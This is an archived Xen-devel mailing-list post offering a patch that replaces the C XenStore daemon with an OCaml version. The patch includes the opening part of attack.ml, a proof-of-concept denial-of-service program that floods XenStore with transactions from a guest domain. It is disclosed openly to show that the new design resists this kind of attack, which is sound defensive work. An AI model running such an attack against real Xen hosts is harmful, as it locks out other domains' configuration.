WARNING - OLD ARCHIVES

This is an archived copy of the Xen.org mailing list, which we have preserved to ensure that existing links to archives are not broken. The live archive, which contains the latest emails, can be found at http://lists.xen.org/
   
 
 
Xen 
 
Home Products Support Community News
 
   
 

xen-devel

Re: [Xen-devel] OCaml XenStore

To: xen-devel@xxxxxxxxxxxxxxxxxxx
Subject: Re: [Xen-devel] OCaml XenStore
From: Patrick Colp <pjcolp@xxxxxxxxx>
Date: Thu, 15 Jan 2009 16:49:43 -0800
Cc: "Andrew Warfield \(cs\)" <andy@xxxxxxxxx>
Delivery-date: Thu, 15 Jan 2009 16:52:08 -0800
Envelope-to: www-data@xxxxxxxxxxxxxxxxxxx
In-reply-to: <493DB45B.2020509@xxxxxxxxx>
List-help: <mailto:xen-devel-request@lists.xensource.com?subject=help>
List-id: Xen developer discussion <xen-devel.lists.xensource.com>
List-post: <mailto:xen-devel@lists.xensource.com>
List-subscribe: <http://lists.xensource.com/mailman/listinfo/xen-devel>, <mailto:xen-devel-request@lists.xensource.com?subject=subscribe>
List-unsubscribe: <http://lists.xensource.com/mailman/listinfo/xen-devel>, <mailto:xen-devel-request@lists.xensource.com?subject=unsubscribe>
References: <49388712.70909@xxxxxxxxx> <493DB45B.2020509@xxxxxxxxx>
Sender: xen-devel-bounces@xxxxxxxxxxxxxxxxxxx
User-agent: Thunderbird 2.0.0.19 (X11/20090105)
After receiving some more feedback, I've fixed some more issues with the
build. This patch has been tested against the latest xen-unstable tip
(19043).


Patrick


Patrick Colp wrote:
A few issues with this release have been brought to my attention. The most important is an include file which was linked to a file in my build config rather than the system one. The other was the way I was handling socket connection shutdown. So I've fixed both of these and created a new patch which is against the current xen-unstable tip (18881).

Any additional comments would be greatly appreciated.


Patrick


Patrick Colp wrote:
Hello all,

A few months ago I released an OCaml version of XenStore. It was
basically just the C version but written in OCaml. Since then I've put a
lot of work into it and am ready to release the next version. The code
has been cleaned up a lot, modularised, and put into classes.

I've improved the transaction system to use optimistic concurrency
control with copy-on-write. I found that by repeatedly starting a
transaction, write some data, and committing the transaction from a
guest domain, it was possible to create a denial-of-service attack on
XenStore (this attack is included in the release). However, this same
attack run against this version of the OCaml XenStore does not prevent
other transactions from committing.

I'm releasing it as a patch against the current tip (18847). It replaces
the C XenStore with the OCaml one. A tarball of the OCaml XenStore code
is also available on my website at:

http://cs.ubc.ca/~pjcolp/xenstore-ocaml.tar.bz2


Patrick


------------------------------------------------------------------------

_______________________________________________
Xen-devel mailing list
Xen-devel@xxxxxxxxxxxxxxxxxxx
http://lists.xensource.com/xen-devel


------------------------------------------------------------------------

_______________________________________________
Xen-devel mailing list
Xen-devel@xxxxxxxxxxxxxxxxxxx
http://lists.xensource.com/xen-devel

diff -r 10a8fae412c5 tools/xenstore/COPYING
--- a/tools/xenstore/COPYING    Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,515 +0,0 @@
-This license (LGPL) applies to the xenstore library which interfaces
-with the xenstore daemon (as stated in xs.c, xs.h, xs_lib.c and
-xs_lib.h).  The remaining files in the directory are licensed as
-stated in the comments (as of this writing, GPL, see ../../COPYING).
-
-
-                  GNU LESSER GENERAL PUBLIC LICENSE
-                       Version 2.1, February 1999
-
- Copyright (C) 1991, 1999 Free Software Foundation, Inc.
-       51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-[This is the first released version of the Lesser GPL.  It also counts
- as the successor of the GNU Library Public License, version 2, hence
- the version number 2.1.]
-
-                            Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-Licenses are intended to guarantee your freedom to share and change
-free software--to make sure the software is free for all its users.
-
-  This license, the Lesser General Public License, applies to some
-specially designated software packages--typically libraries--of the
-Free Software Foundation and other authors who decide to use it.  You
-can use it too, but we suggest you first think carefully about whether
-this license or the ordinary General Public License is the better
-strategy to use in any particular case, based on the explanations
-below.
-
-  When we speak of free software, we are referring to freedom of use,
-not price.  Our General Public Licenses are designed to make sure that
-you have the freedom to distribute copies of free software (and charge
-for this service if you wish); that you receive source code or can get
-it if you want it; that you can change the software and use pieces of
-it in new free programs; and that you are informed that you can do
-these things.
-
-  To protect your rights, we need to make restrictions that forbid
-distributors to deny you these rights or to ask you to surrender these
-rights.  These restrictions translate to certain responsibilities for
-you if you distribute copies of the library or if you modify it.
-
-  For example, if you distribute copies of the library, whether gratis
-or for a fee, you must give the recipients all the rights that we gave
-you.  You must make sure that they, too, receive or can get the source
-code.  If you link other code with the library, you must provide
-complete object files to the recipients, so that they can relink them
-with the library after making changes to the library and recompiling
-it.  And you must show them these terms so they know their rights.
-
-  We protect your rights with a two-step method: (1) we copyright the
-library, and (2) we offer you this license, which gives you legal
-permission to copy, distribute and/or modify the library.
-
-  To protect each distributor, we want to make it very clear that
-there is no warranty for the free library.  Also, if the library is
-modified by someone else and passed on, the recipients should know
-that what they have is not the original version, so that the original
-author's reputation will not be affected by problems that might be
-introduced by others.
-
-  Finally, software patents pose a constant threat to the existence of
-any free program.  We wish to make sure that a company cannot
-effectively restrict the users of a free program by obtaining a
-restrictive license from a patent holder.  Therefore, we insist that
-any patent license obtained for a version of the library must be
-consistent with the full freedom of use specified in this license.
-
-  Most GNU software, including some libraries, is covered by the
-ordinary GNU General Public License.  This license, the GNU Lesser
-General Public License, applies to certain designated libraries, and
-is quite different from the ordinary General Public License.  We use
-this license for certain libraries in order to permit linking those
-libraries into non-free programs.
-
-  When a program is linked with a library, whether statically or using
-a shared library, the combination of the two is legally speaking a
-combined work, a derivative of the original library.  The ordinary
-General Public License therefore permits such linking only if the
-entire combination fits its criteria of freedom.  The Lesser General
-Public License permits more lax criteria for linking other code with
-the library.
-
-  We call this license the "Lesser" General Public License because it
-does Less to protect the user's freedom than the ordinary General
-Public License.  It also provides other free software developers Less
-of an advantage over competing non-free programs.  These disadvantages
-are the reason we use the ordinary General Public License for many
-libraries.  However, the Lesser license provides advantages in certain
-special circumstances.
-
-  For example, on rare occasions, there may be a special need to
-encourage the widest possible use of a certain library, so that it
-becomes a de-facto standard.  To achieve this, non-free programs must
-be allowed to use the library.  A more frequent case is that a free
-library does the same job as widely used non-free libraries.  In this
-case, there is little to gain by limiting the free library to free
-software only, so we use the Lesser General Public License.
-
-  In other cases, permission to use a particular library in non-free
-programs enables a greater number of people to use a large body of
-free software.  For example, permission to use the GNU C Library in
-non-free programs enables many more people to use the whole GNU
-operating system, as well as its variant, the GNU/Linux operating
-system.
-
-  Although the Lesser General Public License is Less protective of the
-users' freedom, it does ensure that the user of a program that is
-linked with the Library has the freedom and the wherewithal to run
-that program using a modified version of the Library.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.  Pay close attention to the difference between a
-"work based on the library" and a "work that uses the library".  The
-former contains code derived from the library, whereas the latter must
-be combined with the library in order to run.
-
-                  GNU LESSER GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License Agreement applies to any software library or other
-program which contains a notice placed by the copyright holder or
-other authorized party saying it may be distributed under the terms of
-this Lesser General Public License (also called "this License").
-Each licensee is addressed as "you".
-
-  A "library" means a collection of software functions and/or data
-prepared so as to be conveniently linked with application programs
-(which use some of those functions and data) to form executables.
-
-  The "Library", below, refers to any such software library or work
-which has been distributed under these terms.  A "work based on the
-Library" means either the Library or any derivative work under
-copyright law: that is to say, a work containing the Library or a
-portion of it, either verbatim or with modifications and/or translated
-straightforwardly into another language.  (Hereinafter, translation is
-included without limitation in the term "modification".)
-
-  "Source code" for a work means the preferred form of the work for
-making modifications to it.  For a library, complete source code means
-all the source code for all modules it contains, plus any associated
-interface definition files, plus the scripts used to control
-compilation and installation of the library.
-
-  Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running a program using the Library is not restricted, and output from
-such a program is covered only if its contents constitute a work based
-on the Library (independent of the use of the Library in a tool for
-writing it).  Whether that is true depends on what the Library does
-and what the program that uses the Library does.
-
-  1. You may copy and distribute verbatim copies of the Library's
-complete source code as you receive it, in any medium, provided that
-you conspicuously and appropriately publish on each copy an
-appropriate copyright notice and disclaimer of warranty; keep intact
-all the notices that refer to this License and to the absence of any
-warranty; and distribute a copy of this License along with the
-Library.
-
-  You may charge a fee for the physical act of transferring a copy,
-and you may at your option offer warranty protection in exchange for a
-fee.
-
-  2. You may modify your copy or copies of the Library or any portion
-of it, thus forming a work based on the Library, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) The modified work must itself be a software library.
-
-    b) You must cause the files modified to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    c) You must cause the whole of the work to be licensed at no
-    charge to all third parties under the terms of this License.
-
-    d) If a facility in the modified Library refers to a function or a
-    table of data to be supplied by an application program that uses
-    the facility, other than as an argument passed when the facility
-    is invoked, then you must make a good faith effort to ensure that,
-    in the event an application does not supply such function or
-    table, the facility still operates, and performs whatever part of
-    its purpose remains meaningful.
-
-    (For example, a function in a library to compute square roots has
-    a purpose that is entirely well-defined independent of the
-    application.  Therefore, Subsection 2d requires that any
-    application-supplied function or table used by this function must
-    be optional: if the application does not supply it, the square
-    root function must still compute square roots.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Library,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Library, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote
-it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Library.
-
-In addition, mere aggregation of another work not based on the Library
-with the Library (or with a work based on the Library) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may opt to apply the terms of the ordinary GNU General Public
-License instead of this License to a given copy of the Library.  To do
-this, you must alter all the notices that refer to this License, so
-that they refer to the ordinary GNU General Public License, version 2,
-instead of to this License.  (If a newer version than version 2 of the
-ordinary GNU General Public License has appeared, then you can specify
-that version instead if you wish.)  Do not make any other change in
-these notices.
-
-  Once this change is made in a given copy, it is irreversible for
-that copy, so the ordinary GNU General Public License applies to all
-subsequent copies and derivative works made from that copy.
-
-  This option is useful when you wish to copy part of the code of
-the Library into a program that is not a library.
-
-  4. You may copy and distribute the Library (or a portion or
-derivative of it, under Section 2) in object code or executable form
-under the terms of Sections 1 and 2 above provided that you accompany
-it with the complete corresponding machine-readable source code, which
-must be distributed under the terms of Sections 1 and 2 above on a
-medium customarily used for software interchange.
-
-  If distribution of object code is made by offering access to copy
-from a designated place, then offering equivalent access to copy the
-source code from the same place satisfies the requirement to
-distribute the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  5. A program that contains no derivative of any portion of the
-Library, but is designed to work with the Library by being compiled or
-linked with it, is called a "work that uses the Library".  Such a
-work, in isolation, is not a derivative work of the Library, and
-therefore falls outside the scope of this License.
-
-  However, linking a "work that uses the Library" with the Library
-creates an executable that is a derivative of the Library (because it
-contains portions of the Library), rather than a "work that uses the
-library".  The executable is therefore covered by this License.
-Section 6 states terms for distribution of such executables.
-
-  When a "work that uses the Library" uses material from a header file
-that is part of the Library, the object code for the work may be a
-derivative work of the Library even though the source code is not.
-Whether this is true is especially significant if the work can be
-linked without the Library, or if the work is itself a library.  The
-threshold for this to be true is not precisely defined by law.
-
-  If such an object file uses only numerical parameters, data
-structure layouts and accessors, and small macros and small inline
-functions (ten lines or less in length), then the use of the object
-file is unrestricted, regardless of whether it is legally a derivative
-work.  (Executables containing this object code plus portions of the
-Library will still fall under Section 6.)
-
-  Otherwise, if the work is a derivative of the Library, you may
-distribute the object code for the work under the terms of Section 6.
-Any executables containing that work also fall under Section 6,
-whether or not they are linked directly with the Library itself.
-
-  6. As an exception to the Sections above, you may also combine or
-link a "work that uses the Library" with the Library to produce a
-work containing portions of the Library, and distribute that work
-under terms of your choice, provided that the terms permit
-modification of the work for the customer's own use and reverse
-engineering for debugging such modifications.
-
-  You must give prominent notice with each copy of the work that the
-Library is used in it and that the Library and its use are covered by
-this License.  You must supply a copy of this License.  If the work
-during execution displays copyright notices, you must include the
-copyright notice for the Library among them, as well as a reference
-directing the user to the copy of this License.  Also, you must do one
-of these things:
-
-    a) Accompany the work with the complete corresponding
-    machine-readable source code for the Library including whatever
-    changes were used in the work (which must be distributed under
-    Sections 1 and 2 above); and, if the work is an executable linked
-    with the Library, with the complete machine-readable "work that
-    uses the Library", as object code and/or source code, so that the
-    user can modify the Library and then relink to produce a modified
-    executable containing the modified Library.  (It is understood
-    that the user who changes the contents of definitions files in the
-    Library will not necessarily be able to recompile the application
-    to use the modified definitions.)
-
-    b) Use a suitable shared library mechanism for linking with the
-    Library.  A suitable mechanism is one that (1) uses at run time a
-    copy of the library already present on the user's computer system,
-    rather than copying library functions into the executable, and (2)
-    will operate properly with a modified version of the library, if
-    the user installs one, as long as the modified version is
-    interface-compatible with the version that the work was made with.
-
-    c) Accompany the work with a written offer, valid for at least
-    three years, to give the same user the materials specified in
-    Subsection 6a, above, for a charge no more than the cost of
-    performing this distribution.
-
-    d) If distribution of the work is made by offering access to copy
-    from a designated place, offer equivalent access to copy the above
-    specified materials from the same place.
-
-    e) Verify that the user has already received a copy of these
-    materials or that you have already sent this user a copy.
-
-  For an executable, the required form of the "work that uses the
-Library" must include any data and utility programs needed for
-reproducing the executable from it.  However, as a special exception,
-the materials to be distributed need not include anything that is
-normally distributed (in either source or binary form) with the major
-components (compiler, kernel, and so on) of the operating system on
-which the executable runs, unless that component itself accompanies
-the executable.
-
-  It may happen that this requirement contradicts the license
-restrictions of other proprietary libraries that do not normally
-accompany the operating system.  Such a contradiction means you cannot
-use both them and the Library together in an executable that you
-distribute.
-
-  7. You may place library facilities that are a work based on the
-Library side-by-side in a single library together with other library
-facilities not covered by this License, and distribute such a combined
-library, provided that the separate distribution of the work based on
-the Library and of the other library facilities is otherwise
-permitted, and provided that you do these two things:
-
-    a) Accompany the combined library with a copy of the same work
-    based on the Library, uncombined with any other library
-    facilities.  This must be distributed under the terms of the
-    Sections above.
-
-    b) Give prominent notice with the combined library of the fact
-    that part of it is a work based on the Library, and explaining
-    where to find the accompanying uncombined form of the same work.
-
-  8. You may not copy, modify, sublicense, link with, or distribute
-the Library except as expressly provided under this License.  Any
-attempt otherwise to copy, modify, sublicense, link with, or
-distribute the Library is void, and will automatically terminate your
-rights under this License.  However, parties who have received copies,
-or rights, from you under this License will not have their licenses
-terminated so long as such parties remain in full compliance.
-
-  9. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Library or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Library (or any work based on the
-Library), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Library or works based on it.
-
-  10. Each time you redistribute the Library (or any work based on the
-Library), the recipient automatically receives a license from the
-original licensor to copy, distribute, link with or modify the Library
-subject to these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties with
-this License.
-
-  11. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Library at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Library by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Library.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply, and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  12. If the distribution and/or use of the Library is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Library under this License
-may add an explicit geographical distribution limitation excluding those
-countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  13. The Free Software Foundation may publish revised and/or new
-versions of the Lesser General Public License from time to time.
-Such new versions will be similar in spirit to the present version,
-but may differ in detail to address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Library
-specifies a version number of this License which applies to it and
-"any later version", you have the option of following the terms and
-conditions either of that version or of any later version published by
-the Free Software Foundation.  If the Library does not specify a
-license version number, you may choose any version ever published by
-the Free Software Foundation.
-
-  14. If you wish to incorporate parts of the Library into other free
-programs whose distribution conditions are incompatible with these,
-write to the author to ask for permission.  For software which is
-copyrighted by the Free Software Foundation, write to the Free
-Software Foundation; we sometimes make exceptions for this.  Our
-decision will be guided by the two goals of preserving the free status
-of all derivatives of our free software and of promoting the sharing
-and reuse of software generally.
-
-                            NO WARRANTY
-
-  15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO
-WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW.
-EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
-OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY
-KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
-LIBRARY IS WITH YOU.  SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME
-THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
-
-  16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN
-WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY
-AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU
-FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR
-CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE
-LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING
-RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A
-FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF
-SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
-DAMAGES.
-
-                     END OF TERMS AND CONDITIONS
-
-           How to Apply These Terms to Your New Libraries
-
-  If you develop a new library, and you want it to be of the greatest
-possible use to the public, we recommend making it free software that
-everyone can redistribute and change.  You can do so by permitting
-redistribution under these terms (or, alternatively, under the terms
-of the ordinary General Public License).
-
-  To apply these terms, attach the following notices to the library.
-It is safest to attach them to the start of each source file to most
-effectively convey the exclusion of warranty; and each file should
-have at least the "copyright" line and a pointer to where the full
-notice is found.
-
-
-    <one line to give the library's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This library is free software; you can redistribute it and/or
-    modify it under the terms of the GNU Lesser General Public
-    License as published by the Free Software Foundation; either
-    version 2.1 of the License, or (at your option) any later version.
-
-    This library is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-    Lesser General Public License for more details.
-
-    You should have received a copy of the GNU Lesser General Public
-    License along with this library; if not, write to the Free Software
-    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
-Also add information on how to contact you by electronic and paper mail.
-
-You should also get your employer (if you work as a programmer) or
-your school, if any, to sign a "copyright disclaimer" for the library,
-if necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the
-  library `Frob' (a library for tweaking knobs) written by James
-  Random Hacker.
-
-  <signature of Ty Coon>, 1 April 1990
-  Ty Coon, President of Vice
-
-That's all there is to it!
-
-
diff -r 10a8fae412c5 tools/xenstore/Makefile
--- a/tools/xenstore/Makefile   Wed Jan 14 13:43:17 2009 +0000
+++ b/tools/xenstore/Makefile   Thu Jan 15 15:44:05 2009 -0800
@@ -8,16 +8,55 @@
 CFLAGS += -I.
 CFLAGS += $(CFLAGS_libxenctrl)
 
+
+CAMLLIB = $(shell ocamlc -where)
+DEF_CPPFLAGS += -I$(CAMLLIB)
+
+OCAMLFIND=ocamlfind
+OCAMLOPT=ocamlopt
+
+
+INCLUDES := -I .
+OCAML_LIBS := unix.cmxa
+C_LIBS := $(LDFLAGS_libxenctrl) -lpthread -lc
+
+OBJS := constants.cmx utils.cmx eventchan.cmx interface.cmx xenbus.cmx 
socket.cmx message.cmx connection.cmx dominfo.cmx trace.cmx store.cmx 
domain.cmx os.cmx option.cmx watch.cmx permission.cmx transaction.cmx 
xenstored.cmx process.cmx main.cmx
+C_OBJS := xenbus_c.o eventchan_c.o dominfo_c.o main_c.o
+
+ATTACK_OBJS := constants.cmx utils.cmx interface.cmx socket.cmx message.cmx 
connection.cmx store.cmx attack.cmx
+
+
+# Build rules
+
+.PHONY: all default clean
+
+all: xenstored attack libxenstore.so libxenstore.a clients
+default: all
+
+
+# Source build rules
+
+%.cmx: %.ml
+       $(OCAMLFIND) $(OCAMLOPT) $(INCLUDES) -c $< -o $@
+
+%.o: %.c
+       $(CC) $(CFLAGS) -I$(CAMLLIB) -c $< -o $@
+
+
+# Executable build rules
+
+xenstored: $(OBJS) $(C_OBJS)
+       $(OCAMLFIND) $(OCAMLOPT) -o xenstored $(OCAML_LIBS) $(OBJS) $(C_OBJS) 
-ccopt '$(CFLAGS)' -cclib '$(C_LIBS)' -cclib '$(LDFLAGS)'
+
+
+attack: $(ATTACK_OBJS)
+       $(OCAMLFIND) $(OCAMLOPT) unix.cmxa -o attack $(ATTACK_OBJS) -ccopt 
'$(CFLAGS)' -cclib '$(C_LIBS)' -cclib '$(LDFLAGS)'
+
+
 CLIENTS := xenstore-exists xenstore-list xenstore-read xenstore-rm 
xenstore-chmod
 CLIENTS += xenstore-write xenstore-ls
 
-XENSTORED_OBJS = xenstored_core.o xenstored_watch.o xenstored_domain.o 
xenstored_transaction.o xs_lib.o talloc.o utils.o tdb.o hashtable.o
-
-XENSTORED_OBJS_$(CONFIG_Linux) = xenstored_linux.o
-XENSTORED_OBJS_$(CONFIG_SunOS) = xenstored_solaris.o xenstored_probes.o
-XENSTORED_OBJS_$(CONFIG_NetBSD) = xenstored_netbsd.o
-
-XENSTORED_OBJS += $(XENSTORED_OBJS_y)
+XENSTORED_OBJS = xs_lib.o
 
 ifneq ($(XENSTORE_STATIC_CLIENTS),y)
 LIBXENSTORE := libxenstore.so
@@ -26,26 +65,10 @@
 xenstore xenstore-control: CFLAGS += -static
 endif
 
-.PHONY: all
-all: libxenstore.so libxenstore.a xenstored clients xs_tdb_dump 
 
 .PHONY: clients
 clients: xenstore $(CLIENTS) xenstore-control
 
-ifeq ($(CONFIG_SunOS),y)
-xenstored_probes.h: xenstored_probes.d
-       dtrace -C -h -s xenstored_probes.d
-
-xenstored_solaris.o: xenstored_probes.h
-
-xenstored_probes.o: xenstored_solaris.o
-       dtrace -C -G -s xenstored_probes.d xenstored_solaris.o 
-
-CFLAGS += -DHAVE_DTRACE=1
-endif
- 
-xenstored: $(XENSTORED_OBJS)
-       $(CC) $(CFLAGS) $(LDFLAGS) $^ $(LDFLAGS_libxenctrl) $(SOCKET_LIBS) -o $@
 
 $(CLIENTS): xenstore
        ln -f xenstore $@
@@ -56,8 +79,6 @@
 xenstore-control: xenstore_control.o $(LIBXENSTORE)
        $(CC) $(CFLAGS) $(LDFLAGS) $< -L. -lxenstore $(SOCKET_LIBS) -o $@
 
-xs_tdb_dump: xs_tdb_dump.o utils.o tdb.o talloc.o
-       $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@
 
 libxenstore.so: libxenstore.so.$(MAJOR)
        ln -sf $< $@
@@ -72,13 +93,25 @@
 libxenstore.a: xs.o xs_lib.o
        $(AR) rcs $@ $^
 
+
+# Cleaning rules
+
 .PHONY: clean
-clean:
+clean: clean-xenstored clean attack clean-xs
+
+clean-xenstored:
+       rm -f *.a *.o *.cmx *.cmi xenstored
+
+clean-attack:
+       rm -f *.a *.o *.cmx *.cmi attack
+
+clean-xs:
        rm -f *.a *.o *.opic *.so* xenstored_probes.h
-       rm -f xenstored xs_random xs_stress xs_crashme
-       rm -f xs_tdb_dump xenstore-control
+       rm -f xs_random xs_stress xs_crashme
+       rm -f xenstore-control
        rm -f xenstore $(CLIENTS)
-       $(RM) $(DEPS)
+       $(RM) $(DEP)
+
 
 .PHONY: TAGS
 TAGS:
@@ -88,13 +121,13 @@
 tarball: clean
        cd .. && tar -c -j -v -h -f xenstore.tar.bz2 xenstore/
 
+
+# Install rules
+
 .PHONY: install
 install: all
-       $(INSTALL_DIR) $(DESTDIR)/var/run/xenstored
-       $(INSTALL_DIR) $(DESTDIR)/var/lib/xenstored
        $(INSTALL_DIR) $(DESTDIR)$(BINDIR)
        $(INSTALL_DIR) $(DESTDIR)$(SBINDIR)
-       $(INSTALL_DIR) $(DESTDIR)$(INCLUDEDIR)
        $(INSTALL_PROG) xenstored $(DESTDIR)$(SBINDIR)
        $(INSTALL_PROG) xenstore-control $(DESTDIR)$(BINDIR)
        $(INSTALL_PROG) xenstore $(DESTDIR)/usr/bin
@@ -109,6 +142,7 @@
        $(INSTALL_DATA) xs.h $(DESTDIR)$(INCLUDEDIR)
        $(INSTALL_DATA) xs_lib.h $(DESTDIR)$(INCLUDEDIR)
 
+
 -include $(DEPS)
 
 # never delete any intermediate files.
diff -r 10a8fae412c5 tools/xenstore/README
--- a/tools/xenstore/README     Wed Jan 14 13:43:17 2009 +0000
+++ b/tools/xenstore/README     Thu Jan 15 15:44:05 2009 -0800
@@ -1,5 +1,41 @@
-The following files are imported from the Samba project.  We use the versions
-from Samba 3, the current stable branch.
+OCaml XenStore
 
-talloc.c: samba-trunk/source/lib/talloc.c     r14291 2006-03-13 04:27:47 +0000
-talloc.h: samba-trunk/source/include/talloc.h r11986 2005-12-01 00:43:36 +0000
+
+This is the second version of the OCaml XenStore daemon. It is functionally
+equivalent to the C XenStore daemon, however certain message operations are
+unimplemented. These are: DEBUG, RESUME, and SET_TARGET, which I suggested
+in the new version of the XenStore protocol are unneeded anyway.
+
+Due to some broken tools, a hack was added to support values in non-leaf nodes.
+This can be found by the Hack type of Node in the Store. Ideally this would be
+fixed so that there is no need for the hack.
+
+The trace and verbose output has been changed slightly to show the domain ID
+instead of a hex address. For socket connections, a negative domain ID is used.
+
+Transactions have been improved to use optimistic concurrency control and
+copy-on-write (instead of duplicating the entire store). A denial-of-service
+attack has been included in the build. When run against the current version
+of XenStore it will prevent any transaction from completing, thus effective
+locking out XenStore. However, using the improved transaction implementation
+in the OCaml XenStore, this attack no longer succeeds.
+
+
+The development environment was 32-bit Ubuntu 8.10 with the stock OCaml package
+version 3.10.2. It has been tested on Ubuntu 8.04 with the latest version of
+xen-unstable and OCaml version 3.10.0.
+
+
+
+To compile xenstored, the attack, and the libxenstore libraries simply type:
+
+# make
+
+To install, type:
+
+# make install
+
+
+The OCaml XenStore is a drop-in replacement the original C one and will be
+compiled when Xen (or the tools) are built and will be installed on to the
+system when Xen is installed.
diff -r 10a8fae412c5 tools/xenstore/TODO
--- a/tools/xenstore/TODO       Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,10 +0,0 @@
-TODO in no particular order.  Some of these will never be done.  There
-are omissions of important but necessary things.  It is up to the
-reader to fill in the blanks.
-
-- Timeout failed watch responses
-- Dynamic/supply nodes
-- Persistant storage of introductions, watches and transactions, so daemon can 
restart
-- Remove assumption that rename doesn't fail
-- Multi-root transactions, for setting up front and back ends at same time.
-
diff -r 10a8fae412c5 tools/xenstore/attack.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/attack.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,78 @@
+let xenbus_dev = "/proc/xen/xenbus";;
+
+let xenbus_open dev =
+  Unix.openfile dev [ Unix.O_RDWR ] 0o600;;
+
+let fd = xenbus_open xenbus_dev;;
+let in_set = ref [ fd ];;
+let out_set = ref [ fd ];;
+
+let rec read connection =
+  let (i, o, _) = Unix.select [ fd ] [ fd ] [] (0.0) in
+  
+  in_set := i;
+  out_set := o;
+  
+  if (connection#can_read) then (
+    match (connection#read) with
+    | Some (message) -> message
+    | None -> read connection;
+  ) else (
+    read connection;
+  );;
+
+let get_domain_path connection transaction_id domain_id =
+  connection#write (Message.make Message.XS_GET_DOMAIN_PATH transaction_id 0l 
(Utils.null_terminate (string_of_int domain_id)));
+  Utils.strip_null (read connection).Message.payload;;
+
+let transaction_start connection =
+  connection#write (Message.make Message.XS_TRANSACTION_START 0l 0l 
(Utils.null_terminate Constants.null_string));
+  Int32.of_string (Utils.strip_null (read connection).Message.payload);;
+
